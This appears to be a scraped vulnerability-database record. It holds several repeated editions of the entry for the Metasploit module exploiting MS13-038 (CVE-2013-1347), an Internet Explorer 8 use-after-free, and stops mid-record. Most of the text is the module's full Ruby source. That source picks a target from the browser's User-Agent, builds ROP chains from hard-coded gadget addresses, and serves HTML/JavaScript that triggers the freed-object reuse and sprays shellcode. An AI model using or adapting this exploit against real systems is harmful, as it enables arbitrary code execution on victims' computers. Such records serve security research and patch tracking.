=> \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-09-02T09:46:29", "differentElements": ["modified", "published"], "edition": 60}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "7a6925df4b88b12f210040351a198e68", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-09-02T11:49:04", "history": [], "viewCount": 109, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-50218", "SMNTC-38195", "SMNTC-59162", "SMNTC-58238"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "saint", "idList": ["SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:3EF0C66878E70BB3C355385365B1DFBF", "SAINT:530FA87FA097C35D9629E058CE3C1589"]}, {"type": "nessus", "idList": ["SMB_NT_MS13-038.NASL", "SMB_KB2847140.NASL"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803395", "OPENVAS:803395"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2018-09-02T11:49:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-09-02T11:49:04", "differentElements": ["sourceData"], "edition": 61}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "2fa9fb68124d0ec02a9f4f55ec5cd21d", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-03-14T11:01:30", "history": [], "viewCount": 109, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-50218", "SMNTC-58238", "SMNTC-59162", "SMNTC-38195"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB"]}, {"type": "nessus", "idList": ["SMB_KB2847140.NASL", "SMB_NT_MS13-038.NASL"]}, {"type": "saint", "idList": ["SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:530FA87FA097C35D9629E058CE3C1589", "SAINT:3EF0C66878E70BB3C355385365B1DFBF"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "openvas", "idList": ["OPENVAS:803395", "OPENVAS:1361412562310803395"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-03-14T11:01:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2019-03-14T11:01:30", "differentElements": ["sourceData"], "edition": 62}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "7a6925df4b88b12f210040351a198e68", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-03-14T12:50:44", "history": [], "viewCount": 110, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-50218", "SMNTC-38195", "SMNTC-58238", "SMNTC-59162"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "saint", "idList": ["SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:3EF0C66878E70BB3C355385365B1DFBF", "SAINT:530FA87FA097C35D9629E058CE3C1589"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C"]}, {"type": "nessus", "idList": ["SMB_KB2847140.NASL", "SMB_NT_MS13-038.NASL"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803395", "OPENVAS:803395"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-03-14T12:50:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2019-03-14T12:50:44", "differentElements": ["modified", "published"], "edition": 63}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "ba1f111f7c93d8a6048461e6d17a8ca9", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-03-24T09:32:03", "history": [], "viewCount": 110, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-50218", "SMNTC-38195", "SMNTC-58238", "SMNTC-59162"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C", 